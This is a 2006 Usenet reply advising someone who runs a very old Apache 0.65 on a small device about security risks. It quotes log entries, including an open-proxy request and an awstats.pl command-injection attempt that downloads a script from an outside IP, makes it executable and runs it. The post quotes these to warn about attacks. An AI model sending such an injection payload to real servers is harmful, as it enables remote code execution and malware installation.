On a sunny day (Thu, 2 Feb 2006 02:05:08 +0100) it happened "chiel"
<firstname.lastname@example.org> wrote in <email@example.com>:
>I have created a program that can be manged by a webbrowser.
>Because this device has only a small pice of memory I have lookd up a very
>old apache webserver to run on this device.
>I have installed apache 0.65.
>This works great, but I have one question. What are the risks involved
>running this version?? how can somebody crash this version off apache??
>people can only look at the websites, they can't run there own html code.
>thank you all!
Not sure if tha tversiosn security is broken, but people can send all sorts of
shit in a HTTP request:
That could cause buffer overflows and possibly execute some code.
You need to read the Apache info pages.
And make sure your http.conf file prohibits anything you do noyt want,
like listing directories perhaps.
(Not sure 0.5 had a http.conf ..), also make sure they cannot use it
to forward to an other url, like this:
For example this:
126.96.36.199 - - [30/Jan/2006:14:16:20 +0100] "GET http://www.szlanna.com/prxjdg.cgi?ja HTTP/1.0" 403 274
should give a 403
There is the common attack these days:
aamiens-151-1-99-228.w86-198.abo.wanadoo.fr - - [30/Jan/2006:03:19:48 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 899
This person likely does not even know their PC is infected.
Will you apache handle this?
Telnet hostname 80 and try...